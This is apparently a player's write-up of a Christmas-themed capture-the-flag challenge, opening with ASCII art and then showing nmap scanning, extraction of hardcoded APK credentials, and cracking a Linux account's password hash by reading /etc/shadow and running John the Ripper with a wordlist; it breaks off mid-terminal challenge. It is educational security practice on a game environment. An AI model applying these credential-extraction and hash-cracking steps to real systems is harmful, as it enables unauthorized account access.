PEACEONEARTHHOHOHOQQD`............................]JOYPEACEONEARTHSANTAELFQ
PEACEONEARTHHOHOHOQW'.............................]CHRISTMASJOYELFQWHOHOHOQ
ELFPEACEONEARTHELFQf..............................]PEACEONEARTHELFNORTHPOLE
SANTACHRISTMASJOYQQ`..............................]NORTHPOLEQQWNORTHPOLEQWQ
CHRISTMASHOHOHOELFE...............................]SANTAGOODWILLTOWARDSMENQ
GOODWILLTOWARDSMENf...............................]GOODWILLTOWARDSMENSANTAQ
ELFCHRISTMASELFJOY[.........amWNORTHPOLEGOODWILLTOWARDSMENJOYJOYJOYQWELFWQQ
PEACEONEARTHJOYJOY(......._QQWHOHOHOWJOYWPEACEONEARTHPEACEONEARTHNORTHPOLEQ
NORTHPOLEELFELFJOY`.......mSANTAQQWCHRISTMASQQWGOODWILLTOWARDSMENQQWHOHOHOQ
JOYSANTANORTHPOLEQ`......=CHRISTMASPEACEONEARTHSANTANORTHPOLENORTHPOLESANTA
NORTHPOLESANTAJOYQ.......]NORTHPOLEPEACEONEARTHELFHOHOHOGOODWILLTOWARDSMENQ
ELFNORTHPOLESANTAQ.......]GOODWILLTOWARDSMENQWELFJOYPEACEONEARTHCHRISTMASQQ
HOHOHONORTHPOLEJOY.......]GOODWILLTOWARDSMENJOYJOYQWPEACEONEARTHJOYWSANTAWQ
PEACEONEARTHJOYELF.......-QWSANTAELFWSANTAWHOHOHOPEACEONEARTHCHRISTMASELFQQ
CHRISTMASSANTAJOYQ........]SANTASANTASANTAGOODWILLTOWARDSMENPEACEONEARTHELF
ELFHOHOHOCHRISTMAS;........?ELFJOYPEACEONEARTHELFQWGOODWILLTOWARDSMENHOHOHO
GOODWILLTOWARDSMEN[.........-"????????????????????4ELFCHRISTMASHOHOHOQQWELF
SANTASANTAJOYSANTAL...............................]HOHOHOQWJOYELFQQWJOYJOYQ
NORTHPOLECHRISTMASQ...............................]NORTHPOLEELFQWJOYJOYELFQ
SANTANORTHPOLEELFQWc..............................]GOODWILLTOWARDSMENSANTAQ
JOYSANTACHRISTMASQQm..............................]ELFNORTHPOLECHRISTMASELF
CHRISTMASSANTASANTAQL.............................]PEACEONEARTHWJOYJOYQQWQQ
ELFNORTHPOLEHOHOHOJOYc............................]SANTACHRISTMASJOYELFJOYQ
SANTAELFHOHOHOJOYJOYQQc...........................]PEACEONEARTHSANTAQQWJOYQ
GOODWILLTOWARDSMENSANTAw,.........................]NORTHPOLEHOHOHONORTHPOLE
NORTHPOLENORTHPOLEQWSANTAa,.......................]PEACEONEARTHWSANTAWJOYQQ
SANTACHRISTMASHOHOHOELFELFQQgwaaaaaaaaaaaaaaaaaaaajCHRISTMASJOYPEACEONEARTH
SANTAHOHOHOPEACEONEARTHSANTAQWWWWWWWWWWWWWWWWWWWWHOHOHOELFJOYCHRISTMASELFQQ
NORTHPOLESANTASANTANORTHPOLESANTAPEACEONEARTHCHRISTMASELFHOHOHOELFJOYWJOYQQ
JOYELFJOYNORTHPOLEPEACEONEARTHJOYGOODWILLTOWARDSMENPEACEONEARTHELFELFELFELF
SANTAJOYCHRISTMASQQWELFWGOODWILLTOWARDSMENSANTANORTHPOLENORTHPOLEJOYWSANTAQ
JOYPEACEONEARTHSANTAGOODWILLTOWARDSMENJOYPEACEONEARTHJOYELFJOYCHRISTMASJOYQ
PEACEONEARTHJOYHOHOHOJOYHOHOHONORTHPOLEHOHOHOGOODWILLTOWARDSMENPEACEONEARTH
SANTASANTAELFJOYQQP???????????????????????????????4PEACEONEARTHJOYQWSANTAQQ
ELFELFHOHOHOHOHOHOf...............................]GOODWILLTOWARDSMENJOYELF
SANTAJOYELFELFELFQf...............................]CHRISTMASNORTHPOLESANTAQ
SANTAHOHOHOELFJOYQf...............................]GOODWILLTOWARDSMENELFELF
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASJOYQWQ
JOYSANTAELFJOYELFQf...............................]PEACEONEARTHSANTAWHOHOHO
CHRISTMASCHRISTMASf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHSANTAQf...............................]HOHOHOHOHOHOJOYWHOHOHOWQ
JOYELFHOHOHOJOYELFf...............................]GOODWILLTOWARDSMENHOHOHO
SANTANORTHPOLEJOYQf...............................]PEACEONEARTHNORTHPOLEELF
HOHOHOGOODWILLTOWARDSMENSANTAWJOYQ@'.............sPEACEONEARTHELFWCHRISTMAS
GOODWILLTOWARDSMENHOHOHOCHRISTMASF............._yWWPEACEONEARTHELFELFJOYWQQ
SANTAGOODWILLTOWARDSMENQQWELFQQ@'.............sQWGOODWILLTOWARDSMENJOYJOYQQ
NORTHPOLECHRISTMASNORTHPOLEQQWF............._yQWELFELFELFSANTASANTAHOHOHOQQ
NORTHPOLECHRISTMASELFQQWELFQ@'.............aWCHRISTMASELFPEACEONEARTHQQWELF
SANTAHOHOHOHOHOHOJOYWSANTAQ?............._yQWPEACEONEARTHCHRISTMASQQWJOYJOY
CHRISTMASSANTACHRISTMASQQ@'.............aJOYNORTHPOLESANTAELFHOHOHOSANTAELF
SANTACHRISTMASNORTHPOLEW?............._yCHRISTMASCHRISTMASCHRISTMASHOHOHOQQ
PEACEONEARTHHOHOHOQWQQD'.............aHOHOHOHOHOHONORTHPOLEHOHOHOELFWHOHOHO
HOHOHOCHRISTMASELFELF!............._mGOODWILLTOWARDSMENCHRISTMASSANTASANTAQ
JOYPEACEONEARTHELFQD'.............aCHRISTMASPEACEONEARTHSANTAHOHOHOWSANTAQQ
NORTHPOLEJOYHOHOHOF.............."????????????????4PEACEONEARTHQQWHOHOHOELF
HOHOHOELFSANTAELFQf...............................]SANTAQWJOYWNORTHPOLEELFQ
HOHOHOPEACEONEARTHf...............................]PEACEONEARTHPEACEONEARTH
JOYPEACEONEARTHELFf...............................]HOHOHOSANTASANTASANTAELF
GOODWILLTOWARDSMENf...............................]PEACEONEARTHNORTHPOLEJOY
NORTHPOLEHOHOHOELFf...............................]HOHOHOCHRISTMASWSANTAELF
ELFSANTACHRISTMASQf...............................]SANTAJOYJOYQWSANTAJOYWQQ
HOHOHONORTHPOLEJOYf...............................]PEACEONEARTHSANTAHOHOHOQ
GOODWILLTOWARDSMENf...............................]CHRISTMASCHRISTMASSANTAQ
PEACEONEARTHELFJOYf...............................]PEACEONEARTHJOYELFQQWJOY
JOYSANTAPEACEONEARTHSANTAWQQWQQWGOODWILLTOWARDSMENCHRISTMASJOYSANTASANTAJOY
ELFNORTHPOLESANTAELFHOHOHOJOYGOODWILLTOWARDSMENNORTHPOLECHRISTMASQWJOYWELFQ
HOHOHOCHRISTMASSANTAJOYCHRISTMASHOHOHOSANTAELFQQWJOYHOHOHOJOYJOYELFJOYELFQQ
CHRISTMASJOYJOYHOHOHOHOHOHOJOYPEACEONEARTHSANTAELFGOODWILLTOWARDSMENELFELFQ
HOHOHOELFHOHOHOJOYNORTHPOLEHOHOHOCHRISTMASQ???????4GOODWILLTOWARDSMENELFELF
NORTHPOLECHRISTMASQQWELFWELFWPEACEONEARTHQQ.......]HOHOHOCHRISTMASQWELFELFQ
JOYJOYGOODWILLTOWARDSMENSANTAELFQWNORTHPOLE.......]PEACEONEARTHCHRISTMASJOY
JOYELFCHRISTMASELFHOHOHOPEACEONEARTHJOYJOYQ.......]GOODWILLTOWARDSMENHOHOHO
NORTHPOLESANTAELFQQWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASCHRISTMASJOYQWQ
HOHOHOSANTAELFNORTHPOLEPEACEONEARTHELFQWELF.......]SANTAHOHOHOELFSANTAELFQQ
HOHOHOSANTAPEACEONEARTHELFWJOYWSANTAQWELFQQ.......]NORTHPOLENORTHPOLEWELFQQ
SANTAHOHOHOELFELFNORTHPOLENORTHPOLEWELFJOYQ.......]GOODWILLTOWARDSMENSANTAQ
GOODWILLTOWARDSMENHOHOHOWGOODWILLTOWARDSMEN.......]SANTASANTAHOHOHOQWHOHOHO
SANTANORTHPOLESANTAWGOODWILLTOWARDSMENELFQQ.......]CHRISTMASPEACEONEARTHJOY
ELFHOHOHONORTHPOLEP????????????????????????.......]CHRISTMASSANTAQQWJOYELFQ
PEACEONEARTHSANTAQf...............................]ELFHOHOHOSANTAELFJOYELFQ
ELFCHRISTMASELFELFf...............................]GOODWILLTOWARDSMENSANTAQ
PEACEONEARTHHOHOHOf...............................]GOODWILLTOWARDSMENJOYJOY
CHRISTMASNORTHPOLEf...............................]HOHOHONORTHPOLEQWJOYELFQ
ELFPEACEONEARTHELFf...............................]GOODWILLTOWARDSMENSANTAQ
JOYJOYELFSANTAELFQf...............................]SANTANORTHPOLEELFSANTAWQ
JOYHOHOHOSANTAJOYQf...............................]PEACEONEARTHNORTHPOLEELF
SANTAELFELFHOHOHOQf...............................]CHRISTMASPEACEONEARTHELF
HOHOHONORTHPOLEELFf...............................]NORTHPOLEHOHOHOJOYWSANTA
PEACEONEARTHELFJOY6aaaaaaaaaaaaaaaaaaaaaaaa.......]PEACEONEARTHHOHOHOSANTAQ
CHRISTMASELFELFJOYQQWWWWWWWWWWWWWWWWWWWWWQQ.......]NORTHPOLENORTHPOLESANTAQ
NORTHPOLECHRISTMASHOHOHONORTHPOLEHOHOHOJOYQ.......]PEACEONEARTHELFQQWHOHOHO
JOYPEACEONEARTHJOYCHRISTMASPEACEONEARTHELFQ.......]NORTHPOLEJOYPEACEONEARTH
NORTHPOLECHRISTMASPEACEONEARTHHOHOHOSANTAQQ.......]PEACEONEARTHCHRISTMASELF
HOHOHOHOHOHONORTHPOLEELFCHRISTMASHOHOHOELFQ.......]HOHOHONORTHPOLEELFSANTAQ
NORTHPOLEJOYHOHOHOQQWPEACEONEARTHCHRISTMASQ.......]ELFHOHOHOELFSANTAJOYQQWQ
ELFJOYJOYJOYNORTHPOLEJOYPEACEONEARTHSANTAQQ.......]CHRISTMASELFELFQQWHOHOHO
SANTASANTACHRISTMASNORTHPOLENORTHPOLEELFJOY.......]PEACEONEARTHPEACEONEARTH
ELFPEACEONEARTHJOYQWJOYJOYSANTAHOHOHOJOYELF.......]GOODWILLTOWARDSMENJOYQWQ
JOYCHRISTMASJOYCHRISTMASJOYWNORTHPOLEJOYJOYaaaaaaajCHRISTMASPEACEONEARTHJOY
PEACEONEARTHCHRISTMASPEACEONEARTHWELFWSANTAWWWWWWCHRISTMASJOYNORTHPOLEJOYQQ
SANTACHRISTMASSANTAELFJOYQWNORTHPOLEELFSANTAELFQQP]NORTHPOLESANTAJOYWJOYWQQ
ELFJOYCHRISTMASNORTHPOLEWPEACEONEARTHNORTHPOLEQ@^.]HOHOHOHOHOHOELFCHRISTMAS
HOHOHOELFSANTASANTAWNORTHPOLENORTHPOLEJOYQWELFP`..]CHRISTMASPEACEONEARTHJOY
CHRISTMASJOYPEACEONEARTHJOYSANTAQWCHRISTMASQ@"....]JOYGOODWILLTOWARDSMENJOY
GOODWILLTOWARDSMENJOYJOYWHOHOHOHOHOHOQQWELFP`.....]GOODWILLTOWARDSMENELFELF
ELFSANTAHOHOHOGOODWILLTOWARDSMENCHRISTMASW".......]PEACEONEARTHELFQQWELFWQQ
GOODWILLTOWARDSMENNORTHPOLEPEACEONEARTHQP`........]GOODWILLTOWARDSMENSANTAQ
CHRISTMASHOHOHOELFQWJOYWSANTAJOYWELFQQW"..........]GOODWILLTOWARDSMENELFELF
JOYHOHOHOGOODWILLTOWARDSMENHOHOHOELFQP`...........]NORTHPOLENORTHPOLEHOHOHO
PEACEONEARTHGOODWILLTOWARDSMENWJOYQW".............]HOHOHOHOHOHONORTHPOLEJOY
ELFPEACEONEARTHJOYCHRISTMASHOHOHOQP`..............]PEACEONEARTHSANTAWELFWQQ
NORTHPOLEHOHOHOJOYELFSANTAQQWJOYW!................yPEACEONEARTHCHRISTMASELF
CHRISTMASELFELFJOYP?????????????`...............sPEACEONEARTHJOYJOYSANTAELF
JOYHOHOHOELFHOHOHOf..........................._mWQWNORTHPOLECHRISTMASHOHOHO
GOODWILLTOWARDSMENf..........................jCHRISTMASNORTHPOLESANTAJOYJOY
NORTHPOLEHOHOHOELFf........................_JOYPEACEONEARTHELFJOYJOYWJOYWQQ
GOODWILLTOWARDSMENf......................_yGOODWILLTOWARDSMENCHRISTMASELFQQ
NORTHPOLENORTHPOLEf.....................:GOODWILLTOWARDSMENSANTASANTAELFJOY
ELFNORTHPOLEJOYJOYf......................-9NORTHPOLEPEACEONEARTHCHRISTMASQQ
NORTHPOLEELFSANTAQf........................?WGOODWILLTOWARDSMENHOHOHOSANTAQ
GOODWILLTOWARDSMENf..........................4WJOYPEACEONEARTHHOHOHOWELFWQQ
PEACEONEARTHSANTAQf...........................-$SANTACHRISTMASHOHOHOELFJOYQ
HOHOHOELFJOYJOYJOY6aaaaaaaaaaaaa,...............?WWPEACEONEARTHPEACEONEARTH
JOYELFHOHOHOJOYSANTAWWWWWWWWWWWQQc...............-4NORTHPOLEHOHOHOQWJOYELFQ
NORTHPOLEGOODWILLTOWARDSMENSANTAWWg,..............]GOODWILLTOWARDSMENSANTAQ
NORTHPOLEHOHOHOELFHOHOHOCHRISTMASELFc.............]HOHOHOELFSANTAWCHRISTMAS
PEACEONEARTHJOYJOYNORTHPOLESANTAJOYWWg,...........]GOODWILLTOWARDSMENJOYQWQ
ELFHOHOHOELFHOHOHOCHRISTMASCHRISTMASJOYc..........]HOHOHOJOYELFQWCHRISTMASQ
PEACEONEARTHSANTAJOYWCHRISTMASJOYSANTAWWw,........]PEACEONEARTHHOHOHOELFELF
CHRISTMASJOYPEACEONEARTHSANTAPEACEONEARTHQc.......]PEACEONEARTHSANTAELFQWQQ
NORTHPOLEPEACEONEARTHJOYNORTHPOLEJOYELFQQWWw......]PEACEONEARTHWHOHOHOJOYQQ
GOODWILLTOWARDSMENQWHOHOHOQWNORTHPOLEELFELFQQ/....]PEACEONEARTHNORTHPOLEJOY
ELFGOODWILLTOWARDSMENCHRISTMASJOYWJOYWSANTAJOYg...]SANTASANTAHOHOHOJOYQWJOY
NORTHPOLEPEACEONEARTHGOODWILLTOWARDSMENELFELFQWQ,.]PEACEONEARTHNORTHPOLEJOY
CHRISTMASCHRISTMASJOYSANTAWGOODWILLTOWARDSMENQQWQwjPEACEONEARTHSANTAQWJOYQQ
ELFPEACEONEARTHJOYJOYJOYWSANTAQQWPEACEONEARTHCHRISTMASGOODWILLTOWARDSMENJOY
CHRISTMASJOYJOYJOYQWGOODWILLTOWARDSMENSANTAQQWGOODWILLTOWARDSMENJOYWHOHOHOQ
PEACEONEARTHSANTACHRISTMASSANTAELFELFQQWJOYWGOODWILLTOWARDSMENHOHOHOHOHOHOQ
PEACEONEARTHELFELFSANTAQWJOYNORTHPOLEPEACEONEARTHELFSANTAHOHOHOPEACEONEARTH
NORTHPOLECHRISTMASELFNORTHPOLEELFJOYQWCHRISTMASGOODWILLTOWARDSMENNORTHPOLEQ
JOYJOYSANTAJOYSANTACHRISTMASJOYQWPEACEONEARTHNORTHPOLECHRISTMASJOYHOHOHOELF
JOYPEACEONEARTHELFQWELFWCHRISTMASSANTASANTANORTHPOLEQWPEACEONEARTHJOYWJOYWQ
Based on the output above, the answer to this question is BUG BOUNTY.
2. What is inside the ZIP file distributed by Santa’s team?
The next question in this part of the the challenge says we need to find out what is in the ZIP file distributed by Santa’s team.
Looked on Santa’s Twitter account and it looks like there isn’t any thing of use for this question.
On Santa’s Instagram however, there is a picture of a very messy desk that has some books, a laptop, trash, etc. You will see in the image that there is a print out of an nmap scan covered up by the Violent Python book on the desk. Below is the hostname that they were scanning.
Decided to do a basic Nmap scan of the site and come to find that ssh, http, and https ports are open. If you go to the site in a web browser, it will show you an image of Santa’s business card. Doesn’t look like there is any data needed considering I already have the business card.
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-10 01:18 CDT
Nmap scan report for www.northpolewonderland.com (130.211.124.143)
Host is up (0.032s latency).
rDNS record for 130.211.124.143: 143.124.211.130.bc.googleusercontent.com
Not shown: 997 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 5.41 seconds
When I looked back at the picture on Santa’s Instagram, there is a little piece of data on the computer screen in the picture. It looks like the
name of a file named SantaGram_v4.2.zip. Looks like that is the ZIP file that they were talking about in the question. So, I downloaded the file with wget.
wget http://www.northpolewonderland.com/SantaGram_v4.2.zip
--2020-07-10 01:20:40-- http://www.northpolewonderland.com/SantaGram_v4.2.zip
Resolving www.northpolewonderland.com (www.northpolewonderland.com)... 130.211.124.143
Connecting to www.northpolewonderland.com (www.northpolewonderland.com)|130.211.124.143|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1963026 (1.9M) [application/zip]
Saving to: ‘SantaGram_v4.2.zip’
SantaGram_v4.2.zip 100%[=============================================================>] 1.87M 2.16MB/s in 0.9s
2020-07-10 01:20:41 (2.16 MB/s) - ‘SantaGram_v4.2.zip’ saved [1963026/1963026]
Decided to view the contents of the ZIP file with vim. Looks like I have the answer to the question asking what is inside it. There is
an APK file named SantaGram_4.2.apk.
1 " zip.vim version v30
2 " Browsing zipfile /home/n3s0/SantaGram_v4.2.zip
3 " Select a file with cursor and press ENTER
4
5 SantaGram_4.2.apk
However, this ZIP file is password protected. I attempted to get in with an empty password and some other generic passwords before I decided
to look at the previous question. Remembering that they somehow compliment each other. I attempted to enter BUG BOUNTY multiple ways
before I finally got it right.
The password for the ZIP file is bugbounty. After entering the password, the APK file inside could be extracted from the ZIP file.
unzip SantaGram_v4.2.zip
Archive: SantaGram_v4.2.zip
[SantaGram_v4.2.zip] SantaGram_4.2.apk password:
inflating: SantaGram_4.2.apk
The answer to question two is SantaGram_4.2.apk. Looks like it is time to enter the portal in the animated game. Looks like it leads me
to the North Pole.
Part 2 - Awesome Package Konveyance
The two siblings were dazed as they materialized in a snow-covered glade. “W-w-where are we?” Josh shivered.
“Given all the snow and the elves roaming about, I’d say there’s a good chance we’re at the North Pole itself,” Jessica replied.
Thinking through what had just happened, Josh had a realization. “So that’s how Santa transports all those holiday packages on Christmas! He carries that bag around the world and then reaches inside to pull presents directly from the North Pole. Ingenious!”
Jessica added, “And, that’s not all… it looks like Santa is really big into social networking! Not only does he use Twitter and Instagram, it seems that he and the elves use their own homegrown social networking platform called SantaGram. They seem to share information about vulnerabilities they find in software as part of bug bounty programs. Why, they’ve even set up their own bug-finding program.”
“Wow!” Josh responded, “That’s really cool. Let’s take a close look at that SantaGram mobile application. It might help us find out who kidnapped Santa.”
Again, Dear Reader, you are called upon to help the children in their analysis as you answer the following questions. If you get stuck, feel free to explore the North Pole and interact with Santa’s friendly and helpful elves, who are available to give you hints.
Before starting the solutions…
To start out with this challenge, I used apktool to disassemble SantaGram_4.2.apk.
In the writeup it looks like I used SilverSearch to look through this data. But I don’t think I will this time. Too lazy to install new software.
apktool d SantaGram_4.2.apk
WARNING: cgroup v2 is not fully supported yet, proceeding with partial confinement
I: Using Apktool 2.1.1 on SantaGram_4.2.apk
I: Loading resource table...
I: Decoding AndroidManifest.xml with resources...
I: Loading resource table from file: /home/n3s0/apktool/framework/1.apk
I: Regular manifest package...
I: Decoding file-resources...
I: Decoding values */* XMLs...
I: Baksmaling classes.dex...
I: Copying assets and libs...
I: Copying unknown files...
I: Copying original files...
This will disassemble the Java in the APK file into a directory named SantaGram_4.2 which consists of a bunch of PNG, XML,
of SMALI files. This will be like finding a needle in a hay stack. But, that’s okay. Find and Grep commands can be used for this.
3. What username and password are embedded in the APK file?
Answering this question is simple. Search through the directory SantaGram_4.2 retursively to find the data needed. In this case it’s a username and password.
Used both find and grep to search all files in the directory for the string password and had it output the file path that it found the pattern in.
find . -exec grep -H "password" {} \;
There are two options here. There is the file b.smali and there is SplashScreen.smali. Both files contain the string password.
Looks like both files have the data needed to answer the question.
[snipped]
./smali/com/northpolewonderland/santagram/b.smali: const-string v1, "password"
./smali/com/northpolewonderland/santagram/SignUp$1.smali: iget-object v0, v0, Lcom/northpolewonderland/santagram/SignUp;->passwordTxt:Landroid/widget/EditText;
./smali/com/northpolewonderland/santagram/SignUp$1.smali: iget-object v1, v1, Lcom/northpolewonderland/santagram/SignUp;->passwordTxt:Landroid/widget/EditText;
./smali/com/northpolewonderland/santagram/SplashScreen.smali: const-string v1, "password"
[snipped]
If you look below it shows the username and password embedded in plain text at lines 264 and 270.
262 const-string v1, "username"
263
264 const-string v2, "guest"
265
266 invoke-virtual {v0, v1, v2}, Lorg/json/JSONObject;->put(Ljava/lang/String;Ljava/lang/Object;)Lorg/json/JSONObject;
267
268 const-string v1, "password"
269
270 const-string v2, "busyreindeer78"
271
The answer to what the username and password found in the apk file are. Perhaps this would be a good time to note that you shouldn’t embedd credentials in your code?
- Username:
guest - Password:
busyreindeer78
Note: Now that i’m looking at the AndroidManifest.xml file, this could have been found by following android:name="com.northpolewonderland.santagram.SplashScreen"
within the manifest. If your brain is good at connecting the dots, this can be achived by knowing that the smali directory contains all of the disassembled
code. Each . shows it’s place within the directory tree. Than you open up SplashScreen.smali and search for it. The data will be there. May not be elegant.
But, gets the job done in a different way.
Other Ways?
Yes, there is another way to do this with tools like Burp Suite. If you install the APK file in an emulator or android device and you poke around a bit after setting
it up so traffic passes through the tool you get a little more information. For instance, the application will send a request to the host
analytics.northpolewonderland.com with the credentials every so often. You can see the pasted data from BurpSuite.
Below is the raw output of a post request from the device.
Request to https://analytics.northpolewonderland.com:443 [104.198.252.157]
POST /report.php?type=usage HTTP/1.1
Content-Type: application/json
User-Agent: Delvik/1.6.0 (Linux; U; Android 4.4.2; Tab2A7-20F Build/KOT49H)
Host: analytics.northpolewonderland.com
Connection: close
Accept-Encoding: gzip
Content-Length: 105
{"username":"guest","udid":"a4f0fd77e07442a9","type":"usage","password":"busyreindeer78","activity":"Me"}
The answer to the question can be found below.
- Username: guest
- Password: busyreindeer78
4. What is the name of the audible component (audio file) in the SantaGram APK file?
I used a similiar approach as the previous question to answer this one. But, I just searched for anything with *.mp3 in the name.
The output isn’t too exciting. But, it gets the job done and answers the question.
find . -name *.mp3
./res/raw/discombobulatedaudio1.mp3
The answer to this question is: discombobulatedaudio1.mp3
There are multiple of these. So I stashed it. Played it with mplayer and startled the shit out of me. Mostly because my volume was all the way up.
Part 3 - Fresh Baked Holiday Pi
Jessica was perplexed. “That audio inside of the SantaGram application sounds really strange. I wonder what it means.”
The children quickly realized that they could only get so far in their analysis of SantaGram using the phones they had brought with them to the North Pole. Jessica summarized their situation, “Gosh, I wish I had brought my laptop with me. Without it, we’re not going to be able to dissect that application. And, time is of the essence. We need to find and rescue Santa so he can continue to deliver presents, or else Christmas is sunk this year.”
Josh replied, “And, making matters worse, I’ve noticed that some of the doors here at the North Pole have little computer terminals next to them. If we want to open those doors, we’re going to need a machine to interface with those terminals.”
Just then, Jessica noticed something curious and positively useful. “Heeeey! It looks like someone has left piece parts of a computer system called a ‘Cranberry Pi’ strewn all about the North Pole. Perhaps we can fetch all of those pieces and put together a computer we can then use to open those terminals and work on the SantaGram application!”
Josh was excited again. “I’ll bet that with a fully operational Cranberry Pi, we’ll be able to find Santa Claus and save Christmas!”
Now, Dear Reader, scurry around the North Pole and retrieve all of the computer parts to build yourself a Cranberry Pi. Once your Pi is fully operational, please help the Dosis children find and rescue Santa, answering the following questions:
5. What is the password for the “cranpi” account on the Cranberry Pi system?
The challenge initiated when I downloaded the cranbian-jessie.img file from my discussion with Holly
Evergreen in the North Pole. In order to put the Cranberry Pi together, I need a password. I downloaded the
Cranbian image file and started searching for the password.
Luckily I have the image from back when I did this challenge. So I can go through some password cracking. For starters, I unzip the Cranbian image file from the zip file.
unzip cranbian.img.zip
Archive: cranbian.img.zip
inflating: cranbian-jessie.img
This will export the file cranbian-jessie.img file from the zip archive. Now it’s time to investigate the iamge file. I remember looking at this when I was in college doing it and thought, “You can really mount img files?” Yes, you can littler me. That’s basically the process for this.
I check the partitions of the img file and I see what the file system looked like using fdisk. Needed
to check the sector size; which was 512 bytes, and needed to look for the second partition. Which starts at
137216 bytes.
fdisk -l cranbian-jessie.img
Disk cranbian-jessie.img: 1.29 GiB, 1389363200 bytes, 2713600 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5a7089a1
Device Boot Start End Sectors Size Id Type
cranbian-jessie.img1 8192 137215 129024 63M c W95 FAT32 (LBA)
cranbian-jessie.img2 137216 2713599 2576384 1.2G 83 Linux
Using the mount(1) command, I mount the second partition of the cranbian-jessie.img file and mount it
to the /mnt directory. I make sure I can see all of the output available for troubleshooting purposes
by using the verbose (-v) flag. Using the -o flag with the offset option I utilize the arithmetic
expression $((512*137216)). This allowed me to find the the exact offset for the sector that’s avaialble.
The rest of this command is pretty self-explainatory. But, I will do it anyway. Utilizing the -t flag
I specify the filesystem that I want to mount it as; ext4, and then the img file I wasnt to mount and where I
want to mount it.
Not quite sure why I felt the need to expain all of this. But, I explained it then. Quite frankly it’s not going to make sense to everyone. I provided the man page number for that specific purpose.
sudo mount -v -o offset=$((512*137216)) -t ext4 cranbian-jessie.img /mnt
mount: /mnt does not contain SELinux labels.
You just mounted a file system that supports labels which does not
contain labels, onto an SELinux box. It is likely that confined
applications will generate AVC messages and not be allowed access to
this file system. For more details see restorecon(8) and mount(8).
mount: /dev/loop7 mounted on /mnt.
From the looks of it, the file system mounted as expected. Now it’s time to search for that password.
ls /mnt/
bin boot dev etc home lib lost+found media mnt opt proc root run sbin srv sys tmp usr var
Decided to check and see if the cranpi user was in the /etc/passwd file in the image.
Looks like it’s indeed in there. It’s password is located in the /etc/shadow file. Which is
indicated by the x within the output.
grep cranpi etc/passwd
cranpi:x:1000:1000:,,,:/home/cranpi:/bin/bash
Below is the ouptut for the /etc/shadow file. This contains the password hash for the user. Which
I will be using John the Ripper to crack after I combine the two files together. This shows that it uses
the SHA-512; as indicated by the $6$ within the output. Looks like the has is also salted with a
random string. But, this shouldn’t be too much of an issue.
sudo grep cranpi etc/shadow
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::
Needed to use the unshadow command so it would take the passwd file and the shadow file
and combine them into one file. This will hold all of the user information containing the usernames and
their hashes. These hashes are what I’ll be focusing on cracking using a wordlist.
sudo unshadow etc/passwd etc/shadow > ~/ctf/shhc/2016/passwords.txt
Output below shows all of the user data that’s contained in the passwords.txt text file. This is
all I’ll be focusing on for this challenge.
grep cranpi ~/ctf/shhc/2016/passwords.txt
cranpi:$6$2AXLbEoG$zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:1000:1000:,,,:/home/cranpi:/bin/bash`
Below is the command used to crack the password. Which in this case only took about 15 to 20 minutes with
a dictionary attack. I utilized the rockyou.txt wordlist to crack the password. This is a pretty
popular wordlist that contains a list of words, leaked passwords, etc so it can be used for cracking new ones.
If a user’s password is in this words list, it can be cracked with a little variation. Looks like john
loaded one hash for cracking and it autodected as either crypt or generic crypt(3).
john --users=1000 --wordlist=~/ctf/shhc/2016/Q5/rockyou.txt --salts=1 --shell=/bin/bash ~/ctf/shhc/2016/passwords.txt
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:29 1% 0g/s 504.6p/s 504.6c/s 504.6C/s yoyo21..yellowsun
0g 0:00:14:39 2% 0g/s 499.5p/s 499.5c/s 499.5C/s HURLEY..Gilmore1
1g 0:00:15:09 100% 0.001099g/s 499.7p/s 499.7c/s 499.7C/s yvette10..yuki01
yummycookies (cranpi)
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Once the session is completed, It shows the cracked password as yummycookies. This is the
password for the cranpi account. Which is also the accepted answer for this challenge.
- Password for cranpi account:
yummycookies
6. How did you open each terminal door and where had the villain imprisoned Santa?
From the sounds of it, this challenge requires that I go through each terminal and explain how I did it. Now that I’ve cracked the password, I should be able to open up the Cranberry Pis. These are little boxes spread out throughout the North Pole that contain little challenges to solve. I will be using this question to go through all of them and demonstrate that they’re complete.
Just note that the original challenge isn’t available. So, I’m going to go off of images that I have available to me. Not all of the data will be complete. But, I will explain everything as best I can.
6.1 Peacoats and PCAPs: Tcpdump Challenge
Below is the challenge output:
*************************************************************************************
* *
* To open the door, find both parts of the passphrase inside of the /out.pcap file. *
* *
*************************************************************************************
For this challenge I had to figure out how to read the file. The scratchy user account didn’t have
the appropriate permission to read the pcap file. Needed to figure out which users were on this system
and which ones could potentially have access to the pcap file.
Decided to check the /etc/passwd file. Just to see what I could find. Looks like there is a user
on there is a user by the name of itchy on here. Which may turn out to be fruitful.
scratchy@5c38c4bcd72f:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
itchy:x:1000:1000::/home/itchy:/bin/sh
scratchy:x:1001:1001:/home/scratchy:/bin/sh
Looks like the itchy username and group both own the file. There are no SUID permissions setup. Going to need to see if I can find another way.
ls -l out.pcap
total 1
-r-------- i itchy itchy 1087929 Dec 2 15:05 out.pcap
I remember with this I utilized the -l flag for sudo(1) to do something. Just couldn’t
remember what. I checked the Man page for sudo and the flag allows you to list the commands that
a particular user can use. Just depends on what’s configured.
Looks like in this case scratchy should be able to use the tcpdump(1) command with no issue.
This is as long as they’re running the command as itchy. You should know where I’m going with this.
scratchy@5c38c4bcd72f:/$ sudo -l
sudo: unable to resolve host 5c38c4bcd72f
Matching Defaults entries for scratchy on 5c38c4bcd72f:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
